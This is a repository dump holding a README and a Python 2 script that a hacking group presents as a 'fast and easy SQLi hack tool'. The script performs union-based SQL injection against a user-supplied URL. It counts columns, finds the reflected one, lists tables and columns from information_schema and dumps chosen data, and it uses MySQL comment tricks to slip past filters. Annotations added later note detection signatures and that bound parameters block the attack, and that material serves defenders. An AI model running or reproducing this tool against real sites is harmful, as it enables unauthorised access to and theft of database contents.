├── README.md
└── sqli.py

/README.md:
--------------------------------------------------------------------------------
# Sqli
- [OK] - Get Database
- [OK] - Enumerate Tables
- [OK] - Enumerate Columns
- [OK] - Dump Columns


--------------------------------------------------------------------------------
/sqli.py:
--------------------------------------------------------------------------------
# Facebook: https://www.facebook.com/TheCybersTeam
# Group: https://www.facebook.com/groups/TheCybersTeam
# Channel: https://www.youtube.com/channel/UCKFMv1cifW55lKKps2thhbw

# NOTE(review): this listing lost its leading whitespace, so the block nesting
# below is reconstructed from syntax; places where more than one nesting is
# possible are marked. The code is Python 2 (print statements, raw_input,
# urllib.urlopen).

import urllib as cybers
import sys
import os
import platform

# Clear the terminal. The command is one of two fixed literals, so no
# external input reaches the shell here.
clear = "clear"
if platform.system() == "Windows":
    clear = "cls"
os.system(str(clear))

# Start-up banner, printed once when the module runs.
# NOTE(review): the spacing inside the ASCII art appears collapsed in this
# listing as well; the literal is kept exactly as shown.
header="""
_____ _ ___ _ _____
/__ \ |__ ___ / __\ _| |__ ___ _ __ ___ /__ \___ __ _ _ __ ___
/ /\/ '_ \ / _ \ / / | | | | '_ \ / _ \ '__/ __| / /\/ _ \/ _` | '_ ` _ \
/ / | | | | __/ / /__| |_| | |_) | __/ | \__ \ / / | __/ (_| | | | | | |
\/ |_| |_|\___| \____/\__, |_.__/ \___|_| |___/ \/ \___|\__,_|_| |_| |_|
|___/
More: https://www.facebook.com/TheCybersTeam
Fast and easy SQLi hack tool Beta 2.3"
"""
print header

class Sqli:
    """Union-based SQL injection client for one GET parameter.

    Every request is the target URL cut after its first "=" followed by a
    UNION SELECT whose keywords are wrapped in /*!50000 ... */ (MySQL
    version-conditional comments, which the server executes).

    What these requests look like on the receiving side, usable as access-log
    or WAF signatures:
      * the parameter value 0x2d31 (hex for "-1") followed by the wrapped
        union/select keywords;
      * the fixed numeric marker in ``key``, repeated once per probed column;
      * the hex delimiters 0x5e27 / 0x275e ("^'" and "'^") placed around
        every extracted value;
      * reads of information_schema.tables and information_schema.columns.

    All of it relies on the page concatenating the parameter into its SQL
    text; a query that binds the parameter as data leaves these requests
    nothing to alter.
    """
    # Target URL up to and including the first "=" (set by setUrl).
    url = None
    # 1-based index of the column whose value shows up in the response
    # (set by setVulCol; 0 when none was found).
    vulCol = None
    # Column count found by setColumns; 0 when no count from 1 to 49 matched.
    columns = None
    # Db objects. Defined on the class, so the list is shared by all instances.
    dbs = []
    # Prefix appended to the URL for every query: 0x2d31 is "-1" in hex.
    payload = "0x2d31+/*!50000union*/+/*!50000select*/"
    # [select list before the reflected column, select list after it];
    # filled by getDatabase and reused by the later queries.
    build = ["", ""]
    # Marker searched for in responses to tell that a value was reflected.
    key = "1620597971540027"
    def setUrl(self):
        """Read the target from the argument that follows ``--url``.

        Only the part of the URL up to and including the first "=" is kept,
        so the parameter's original value is discarded. Prints a usage
        message and exits when no value was supplied.
        """
        for k, v in enumerate(sys.argv):
            if v == "--url":
                try:
                    u = sys.argv[k+1]
                    pos = u.find("=")
                    # If the URL has no "=", find() returns -1 and this
                    # slice is the empty string.
                    url = u[:pos+1]
                    self.url = url
                except:
                    # IndexError when --url is the last argument; u stays
                    # unbound and the NameError branch below reports it.
                    pass
        try:
            print "Url: "+u
            print "\n"
        except NameError:
            # NOTE(review): nesting reconstructed. The prints and exit() are
            # placed inside this branch because at function level they would
            # run on every call; confirm against the original file.
            pass
            print "*ERROR*: Url not defined!\n"
            print "Usage: python sqli.py --url http://testphp.vulnweb.com/listproducts.php?cat=1\n"
            exit()

    def getContent(self,url):
        """Fetch ``url`` with urllib.urlopen and return the response body.

        Nothing is caught here, so any urllib error propagates to the caller.
        """
        res = cybers.urlopen(url)
        return res.read()

    def setColumns(self):
        """Probe for the number of columns the UNION SELECT must supply.

        Sends up to 49 requests, each with one more copy of the marker in the
        select list, and stores the first count whose response contains the
        marker but not the literal text "union select". Stores 0 when no
        count matched.
        """
        print "Start Count Columns..."
        url = self.url + self.payload
        start = 1
        finish = 50
        # range(1, 50) yields 1..49, so the `i != finish` test is always true.
        # On the server this is a burst of near-identical requests whose
        # marker list grows by one entry each time.
        for i in range(start,finish):
            sys.stdout.write("\rColumns Total: {0}".format(i))
            if i != start and i != finish:
                url+=", "
            url+=self.key
            res = self.getContent(url)
            # presumably skips pages that echo the query text back, e.g. in
            # an error message - TODO confirm
            if res.find("union select") ==-1:
                if res.find("1620597971540027") !=-1:
                    self.columns = i
                    return
        self.columns = 0

    def setVulCol(self):
        """Find which column of the select list is rendered into the page.

        For each position i a request is sent in which position i carries the
        marker and every other position carries its own index, each wrapped in
        single quotes by ConCat(0x27, ..., 0x27). The first i whose response
        contains the marker is stored in ``vulCol``. If none does (including
        when ``columns`` is 0), ``vulCol`` is set to 0 and the process exits.
        """
        for i in range(1, self.columns+1):
            line = self.payload
            for j in range(1, self.columns+1):
                # j never equals columns+1 inside this range, so only the
                # `j != 1` part of the test has an effect.
                if j != 1 and j != self.columns+1:
                    line = line + ", "
                if i == j:
                    line+="/*!50000ConCat(0x27,"+self.key+",0x27)*/"
                else:
                    line+="/*!50000ConCat(0x27,"+str(j)+",0x27)*/"
            res = self.getContent(self.url + line)
            if res.find(self.key) !=-1:
                self.vulCol = i
                return
        self.vulCol = 0
        exit()

    def getConcat(self,string):
        """Wrap a SQL expression in group_concat plus the 0x5e27 / 0x275e
        ("^'" and "'^") delimiters that getVars searches for."""
        return "/*!50000Concat(0x5e27,/*!50000gROup_cONcat("+string+")*/,0x275e)"

    def getVars(self,content):
        """Return the text between the first "^'" and the next "'^" in
        ``content``."""
        pos = content.find("^'")
        if(pos != -1):
            ini = content[pos+2:]
            pos = ini.find("'^")
            if(pos !=-1):
                return ini[:pos]
            # With this nesting, a missing end delimiter falls through and
            # the method returns None.
        else:
            # NOTE(review): the `else` is attached to the outer `if` here; it
            # could equally belong to the inner one - confirm against the
            # original file.
            print "*ERROR*: Not found!\n"
            exit()

    def getDatabase(self):
        """Build the select list around the reflected column and request
        database().

        After the loop ``self.build[0]`` holds the URL, the payload prefix and
        the column indexes before ``vulCol`` (with a trailing comma), and
        ``self.build[1]`` holds the indexes after it. Later queries place
        their own expression between the two halves. Returns whatever
        getVars extracts from the response.
        """
        self.build = [self.url + self.payload, ""]
        line = ""
        side = 0
        for i in range(1, self.columns+1):
            if i != 1 and i != self.columns+1:
                line=","
            if side == 0:
                if i != self.vulCol:
                    self.build[side]+=line+str(i)
                    line+= str(i)
                else:
                    # Reached the reflected column: close the left half and
                    # switch to filling the right half.
                    if i !=1:
                        self.build[side]+=","
                    side = 1
            else:
                self.build[side]+=line+str(i)
        url = self.build[0]+"/*!50000Group_Concat(0x5e27,database(),0x275e)*/"+self.build[1]
        res = self.getContent(url)
        return self.getVars(res)

    def getTables(self,database):
        """Request the table names of the current schema from
        information_schema.tables.

        ``database`` is accepted but not used; the query calls database()
        itself. Returns the comma-joined names extracted by getVars.
        """
        url = self.build[0]+self.getConcat("table_name")+self.build[1]+"++from+/*!50000inforMAtion_schema*/.tables+ /*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+"
        res = self.getContent(url)
        return self.getVars(res)

    def charCode(self,string):
        """Return the decimal character codes of ``string`` joined by ", ",
        in the form used inside CHAR(...) by getColumns."""
        char = ""
        last = len(string)-1
        i = 0
        for j in string:
            char+=str(ord(j))
            if last != i:
                char+=", "
            i+=1
        return char

    def getColumns(self,table,database):
        """Request the column names of ``table`` from
        information_schema.columns.

        The table name is sent as CHAR(<codes>) rather than as a quoted
        string. ``database`` is accepted but not used. Returns the
        comma-joined names extracted by getVars.
        """
        url = self.build[0]+self.getConcat("column_name")+self.build[1]+"++from+/*!50000inforMAtion_schema*/.columns+ /*!50000wHEre*/+/*!50000taBLe_name*/=CHAR("+self.charCode(table)+")--+"
        res = self.getContent(url)
        return self.getVars(res)

    def getData(self,cols,table,database):
        """Fetch the named columns of ``table`` and print them as a padded
        text table.

        Column values are joined with 0x3a (":") and rows with "," by
        group_concat, then split on the same characters, so a value that
        contains either character is split in the wrong place. The parsed
        rows are also stored on ``self.dbs[0].tables[0]``, whichever table
        was requested. ``database`` is accepted but not used.
        """
        line = ""
        i = 0
        # title is built but never read afterwards.
        title = ""
        # Widest value seen per column, seeded with the column-name lengths.
        space = []
        for name in cols:
            space.append(len(name))
            title+=name+"\t"
            if i !=0:
                line+=",0x3a,"
            line+=name
            i+=1
        # cols and table are placed into the URL exactly as the operator
        # typed them.
        url = self.build[0]+"/*!50000ConCAt(0x5e27,/*!50000gROup_cONcat("+line+")*/,0x275e)"+self.build[1]+"+from+"+table+"--+-"
        res = self.getContent(url)
        data = self.getVars(res)
        try:
            rows = data.split(",")
        except:
            # If data is None this prints the error but does not stop; rows
            # is then unbound and the loop below raises NameError.
            print "*ERROR*: Not found!\n"
        vector = []
        for j in rows:
            i=0
            col = j.split(":")
            temp = []
            for k in col:
                temp.append(k)
                if len(k)>space[i]:
                    space[i]=len(k)
                i=i+1
            vector.append(temp)
        self.dbs[0].tables[0].setDatas(vector)
        line=""
        i=0
        for j in cols:
            line+=j
            # i is not advanced in this loop, so every header cell is padded
            # against space[0].
            for k in range(len(j),space[i]+2):
                line+=" "
        print line
        for j in rows:
            i = 0
            col = j.split(":")
            line=""
            i=0
            for k in col:
                line+=k
                for l in range(len(k),space[i]+2):
                    line +=" "
                i=i+1
            print line

class Db:
    """Plain holder for one database name and its Tb objects."""
    name = None
    # Class-level default; setTables rebinds it on the instance.
    tables = []
    def setName(self, name):
        """Store the database name."""
        self.name = name
    def setTables(self, table):
        """Store the list of Tb objects."""
        self.tables = table

class Tb:
    """Plain holder for one table name, its column names and its rows."""
    name = None
    # Class-level defaults; the setters rebind them on the instance.
    columns = []
    rows = []
    def setName(self,name):
        """Store the table name."""
        self.name = name
    def setColumns(self,columns):
        """Store the list of column names."""
        self.columns = columns
    def setDatas(self,rows):
        """Store the parsed rows (a list of lists of strings)."""
        self.rows = rows

# Script body: runs top to bottom when the file is executed.
s = Sqli()
s.setUrl()

# Column count first, then the position that is reflected in the page.
s.setColumns()
s.setVulCol()
print "\nVul Column: " +str(s.vulCol)

db = Db()
database = s.getDatabase()
db.setName(database)
s.dbs.append(db)

for i in s.dbs:
    print "Database: " + i.name

tbs = []
tables = s.getTables(s.dbs[0].name)
for i in tables.split(","):
    tb = Tb()
    tb.setName(i)
    tbs.append(tb)

s.dbs[0].setTables(tbs)
print "Tables: "+tables

# The table name is read from the operator and passed on unchanged.
sys.stdout.write("\nTable: ")
table = raw_input()
cols = s.getColumns(table,s.dbs[0].name)
cls = cols.split(",")
# Stored on the first Tb object, whichever table name was entered.
s.dbs[0].tables[0].setColumns(cls)
print "Columns: "+cols

sys.stdout.write("\nColumns names: ")
cols = raw_input().split(",")
s.getData(cols,table,database)
--------------------------------------------------------------------------------